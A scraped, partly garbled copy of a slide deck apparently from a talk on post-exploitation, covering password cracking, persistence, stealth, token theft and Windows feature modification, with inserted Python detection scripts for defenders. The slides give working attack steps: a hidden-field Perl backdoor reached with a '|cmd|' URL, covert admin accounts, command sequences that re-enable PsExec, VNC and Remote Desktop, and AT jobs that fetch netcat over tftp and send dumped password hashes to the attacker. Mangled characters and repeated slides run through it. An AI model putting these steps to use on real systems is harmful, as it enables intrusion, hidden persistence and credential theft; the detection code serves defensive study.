  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 6: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

• Example
  – Machine has VNC installed
  – Replace installed VNC with vulnerable version
    • Authentication bypass
  – Copy registry password so target doesn't realize
  – Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally

    <input type="hidden" name="Lang">

• Edit web app and tie vulnerable Perl code to the form field input (two-argument open, so the field supplies the mode as well as the name)

    if (defined $hidden_field) { open($filename, ">$hidden_field"); }

• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational Ciphers (rot13, Caesar)
  – Even more complex obfuscation
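Two defender-side checks for the injected web-app backdoors described on slides 24 through 27, written as an added example (not code from the talk). The first scans Perl CGI source for two-argument open() calls whose filename interpolates a variable: in that form the string also carries the mode, so a value beginning or ending with "|" becomes a shell pipe, which is exactly what the lang=|cmd| request relies on. The second scans a web access log for query parameters shaped like a pipe command. The Perl fragment and log lines are constructed for the demo.

```python
"""Hunting for an injected hidden-field / "|cmd|" style backdoor in a Perl CGI app.

Both inputs below are constructed sample data, not artefacts from a real site.
"""
import re
from urllib.parse import parse_qsl, urlsplit

OPEN_RE = re.compile(r"\bopen\s*\(([^)]*)\)")


def split_args(arglist):
    """Split a Perl argument list on top-level commas, keeping quoted strings whole."""
    args, buf, quote = [], "", None
    for ch in arglist:
        if quote:                      # inside a string literal
            buf += ch
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote, buf = ch, buf + ch
        elif ch == ",":
            args.append(buf.strip())
            buf = ""
        else:
            buf += ch
    if buf.strip():
        args.append(buf.strip())
    return args


def risky_opens(perl_source):
    """Return (line_no, call_text) for each two-arg open() that interpolates a variable.

    Three-argument open(FH, MODE, PATH) is not flagged: with an explicit mode the
    path can never be read as a pipe, which is the fix a reviewer would ask for.
    """
    findings = []
    for n, line in enumerate(perl_source.splitlines(), 1):
        for m in OPEN_RE.finditer(line):
            args = split_args(m.group(1))
            if len(args) == 2 and "$" in args[1]:
                findings.append((n, m.group(0)))
    return findings


# Constructed CGI fragment; line 5 is the injected open() from the slide.
PERL_SAMPLE = r"""use CGI;
my $q = CGI->new;
my $hidden_field = $q->param('Lang');
open(my $log, '>>', '/var/log/app.log');
if (defined $hidden_field) { open($filename, ">$hidden_field"); }
open(CONF, "/etc/app.conf");
"""

# Combined-log-format line: client, ident, user, [time], "METHOD target proto", status
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3}')
SHELL_META = set("|;`")


def suspicious_requests(log_text):
    """Return (client, path, param, value) for query values shaped like a shell command."""
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        client, _method, target = m.groups()
        url = urlsplit(target)
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if val.startswith("|") or val.endswith("|") or SHELL_META & set(val):
                hits.append((client, url.path, key, val))
    return hits


# Constructed log lines: one benign request, then the slide's lang=|cmd| shape.
LOG_SAMPLE = """\
10.0.0.5 - - [11/May/2008:12:00:01 -0600] "GET /cgi-bin/app.cgi?lang=en HTTP/1.1" 200 512
10.0.0.9 - - [11/May/2008:12:00:07 -0600] "GET /cgi-bin/app.cgi?lang=%7Ccmd%7C HTTP/1.1" 200 88
10.0.0.9 - - [11/May/2008:12:00:09 -0600] "POST /cgi-bin/app.cgi HTTP/1.1" 200 88
"""

if __name__ == "__main__":
    for n, call in risky_opens(PERL_SAMPLE):
        print(f"source line {n}: {call}")
    for hit in suspicious_requests(LOG_SAMPLE):
        print("request:", hit)
```

The log check only sees the query string, so the POST variant with the hidden field in the body and the trigger-string decoder of slides 26 and 27 (ordinary-looking values in Name, Age and Address) leave nothing for it to match; for those, the source scan and a file-integrity baseline of the CGI directory are the checks that still work.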

Slide 28

Persistence

• Covert Accounts
  – Add an account / re-enable one
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files or new accounts
  – Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing

Slide 32

Stealth Evading Detection

• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth Evading Detection

• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode Encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels, Steganography
  – Anti-analysis, anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth Evading Detection

• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs
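The slide's point is that object-access auditing lives entirely in the SACL, so an object whose SACL is null or empty produces no log entries however it is touched. The following added example (not from the talk) parses security descriptors in SDDL form, the text representation exported by tools such as PowerShell's Get-Acl, and reports which objects in a set carry no audit ACEs at all. The descriptors are constructed for the demo; conditional ACEs are out of scope.

```python
"""Audit-coverage check for Windows security descriptors given as SDDL strings.

SDDL layout: O:owner G:group D:dacl_flags(ace)(ace)... S:sacl_flags(ace)...
An ACE is (type;flags;rights;object_guid;inherit_guid;sid); only type "AU"
(SYSTEM_AUDIT) entries generate object-access events, with "SA" / "FA" in the
flags selecting success and failure auditing.
"""
import re

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_sddl(sddl):
    """Split SDDL into its components: O and G as strings, D and S as (flags, aces)."""
    parts = {}
    for chunk in re.split(r"(?=[OGDS]:)", sddl):   # ':' never occurs inside an ACE
        if not chunk:
            continue
        key, body = chunk[0], chunk[2:]
        if key in ("O", "G"):
            parts[key] = body
            continue
        flags = body.split("(", 1)[0]
        aces = []
        for raw in ACE_RE.findall(body):
            f = raw.split(";")
            if len(f) < 6:
                continue
            aces.append({"type": f[0], "flags": f[1], "rights": f[2],
                         "object": f[3], "inherit": f[4], "sid": f[5]})
        parts[key] = (flags, aces)
    return parts


def _flag_tokens(flags):
    """ACE flags are fixed two-letter tokens (OI, CI, NP, IO, ID, SA, FA)."""
    return {flags[i:i + 2] for i in range(0, len(flags), 2)}


def audit_coverage(sddl):
    """Summarise what the SACL of a descriptor audits.

    'sacl' is 'absent' (no S: part at all, i.e. a null SACL), 'empty' (S: with no
    ACEs) or 'present'; 'audited' lists the audit ACEs. Absent and empty both mean
    that access to the object is never logged.
    """
    parts = parse_sddl(sddl)
    if "S" not in parts:
        return {"sacl": "absent", "audited": []}
    _flags, aces = parts["S"]
    audited = []
    for ace in aces:
        if ace["type"] != "AU":
            continue
        tokens = _flag_tokens(ace["flags"])
        audited.append({"sid": ace["sid"], "rights": ace["rights"],
                        "success": "SA" in tokens, "failure": "FA" in tokens})
    return {"sacl": "present" if aces else "empty", "audited": audited}


def unaudited(descriptors):
    """Names of objects (from a {name: sddl} map) with no audit ACE at all."""
    return sorted(name for name, sddl in descriptors.items()
                  if not audit_coverage(sddl)["audited"])


# Constructed descriptors for three sensitive objects.
SAMPLE = {
    # No S: component: null SACL, nothing is ever logged.
    "C:\\secrets\\payroll.xlsx": "O:BAG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FR;;;BU)",
    # S: present but every audit ACE stripped: same effect as a null SACL.
    "HKLM\\SOFTWARE\\Vendor": "O:BAG:SYD:PAI(A;;KA;;;SY)S:",
    # Success and failure auditing of full access for Everyone (WD).
    "C:\\secrets\\board.docx": "O:BAG:SYD:(A;;FA;;;SY)S:(AU;SAFA;FA;;;WD)",
}

if __name__ == "__main__":
    for name in unaudited(SAMPLE):
        print("no auditing:", name, audit_coverage(SAMPLE[name])["sacl"])
```

A practical sweep compares the SACLs of high-value objects against the baseline a hardening policy is supposed to apply; an object that was audited last week and reports "absent" or "empty" today is the tampering this slide describes, and because the change removes logging rather than adding anything, the comparison itself is the only place it shows up.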

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is Basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires (l4m3)
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the vnc files
  – Copy the following files to target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command-line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =

  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
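The two files on slides 53 and 54 are ordinary text, and the same is true of the artefacts they leave behind: a secedit template applied through secedit stays readable, and a registry export of the Terminal Server key shows the flipped values. The added example below (not from the talk) parses both formats with one small reader and reports the three changes that matter: deny-logon rights emptied, the remote interactive logon right handed to an account outside the expected groups, and fDenyTSConnections set to 0. The file contents are constructed copies of the slides' files and the expected-group allowlist is an assumption for the demo.

```python
"""Flag the policy and registry edits that re-enable Remote Desktop.

Inputs are the text of a secedit .inf template and a .reg export; both are
[section] headers followed by key=value lines, so one parser serves both.
"""

TS_KEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"
DENY_RIGHTS = ("SeDenyInteractiveLogonRight",
               "SeDenyRemoteInteractiveLogonRight",
               "SeDenyNetworkLogonRight")
# Assumption for the demo: who is allowed to hold the RDP logon right.
EXPECTED_RDP_HOLDERS = {"Administrators", "Remote Desktop Users"}


def parse_ini_like(text):
    """Parse a secedit template or .reg export into {section: {key: value}}.

    .reg value names are double-quoted and dword values are hex; both are
    normalised so callers can compare plain names and integers.
    """
    data, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            data.setdefault(section, {})
            continue
        if "=" not in line:            # e.g. the "Windows Registry Editor" banner
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().strip('"'), value.strip()
        if value.lower().startswith("dword:"):
            value = int(value[6:], 16)
        data.setdefault(section, {})[key] = value
    return data


def policy_findings(inf_text, reg_text=""):
    """Return human-readable findings for the weakening edits shown on the slides."""
    findings = []
    rights = {k.lower(): v for k, v in
              parse_ini_like(inf_text).get("Privilege Rights", {}).items()}
    for name in DENY_RIGHTS:
        if rights.get(name.lower()) == "":
            findings.append(f"{name} cleared: deny list for this logon type removed")
    holders = rights.get("seremoteinteractivelogonright", "")
    for account in filter(None, (a.strip() for a in holders.split(","))):
        if account not in EXPECTED_RDP_HOLDERS:
            findings.append(f"SeRemoteInteractiveLogonRight granted to unexpected account '{account}'")
    ts = parse_ini_like(reg_text).get(TS_KEY, {})
    if ts.get("fDenyTSConnections") == 0:
        findings.append("fDenyTSConnections=0: Terminal Services connections enabled")
    return findings


# Constructed copy of fix_ts_policy.ini from the slide.
INF_SAMPLE = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =
"""

# Constructed copy of enable_ts.reg from the slide.
REG_SAMPLE = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

# A template that keeps the expected holders and a deny entry: no findings.
INF_CLEAN = """\
[Privilege Rights]
SeRemoteInteractiveLogonRight = Administrators,Remote Desktop Users
SeDenyNetworkLogonRight = Guest
"""

if __name__ == "__main__":
    for finding in policy_findings(INF_SAMPLE, REG_SAMPLE):
        print(finding)
```

Run against a live host the inputs would come from `secedit /export /cfg` and `reg export`; the slide's own sequence also leaves orig.secedit.sdb and new.secedit.sdb beside the real database, which a file-integrity check on that directory will notice even before the policy diff does.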

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
    Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
  – Establish authenticated session
  – Determine the time on the target
  – Pass commands to the target to be run 1 min from now
    • Write a batch file that executes everything at once
    • Have the target send you back whatever info you want
    • Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i <us> GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes, identified by IP, back to attacker host
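The scheduler flow on slides 58 through 61 is visible to the same tool it abuses: `at \\host` with no arguments lists every pending job, and the jobs this technique creates have a recognisable shape (one-shot rather than recurring, a tftp transfer, a bare batch file outside any script directory, account changes). The added example below (not from the talk) parses such listings collected from a fleet and triages them. The listing is constructed for the demo and the trusted script directories are an assumption.

```python
"""Triage of 'at \\host' job listings gathered from many hosts.

Listing layout (header, rule, then one job per line):
Status ID   Day                     Time          Command Line
"""
import re

JOB_RE = re.compile(
    r"^\s*(?P<status>ERROR)?\s*(?P<id>\d+)\s+(?P<day>.+?)\s{2,}"
    r"(?P<time>\d{1,2}:\d{2} [AP]M)\s+(?P<cmd>.+?)\s*$")

# Assumption for the demo: where legitimate scheduled scripts live.
TRUSTED_DIRS = ("c:\\scripts\\", "c:\\program files\\")


def parse_at_listing(text):
    """Return a list of {status, id, day, time, cmd} dicts, one per job line."""
    jobs = []
    for line in text.splitlines():
        m = JOB_RE.match(line)
        if m:
            job = m.groupdict()
            job["id"] = int(job["id"])
            jobs.append(job)
    return jobs


def triage(jobs):
    """Map job id -> list of reasons for every job worth a closer look."""
    flagged = {}
    for job in jobs:
        cmd = job["cmd"].lower()
        reasons = []
        if re.search(r"\btftp\b", cmd):
            reasons.append("tftp transfer (file staging)")
        if re.search(r"\bnet\s+(user|localgroup)\b", cmd):
            reasons.append("account or group change")
        if not job["day"].startswith(("Each", "Next")):
            reasons.append("one-shot job")           # Today / Tomorrow, never recurring
        if not cmd.startswith(TRUSTED_DIRS):
            reasons.append("command outside trusted script directories")
        if reasons:
            flagged[job["id"]] = reasons
    return flagged


# Constructed listing: the two jobs from the slide's flow plus a routine backup.
AT_SAMPLE = """\
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Today                   12:01 PM      tftp -i 10.0.0.1 GET nc.exe
        2   Today                   12:02 PM      e.bat
        3   Each M T W Th F         2:00 AM       C:\\scripts\\backup.cmd
"""

if __name__ == "__main__":
    for job_id, reasons in sorted(triage(parse_at_listing(AT_SAMPLE)).items()):
        print(f"job {job_id}: {', '.join(reasons)}")
```

Because the jobs run as SYSTEM and are deleted once they fire, the listing has to be captured while the job is pending or reconstructed from the scheduler's own log and the Tasks directory afterwards; the IPC$ session the flow opens first is the other durable trace, in the Security log of the target.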

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish netbios session / credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to
    • All the people from the offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 7: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

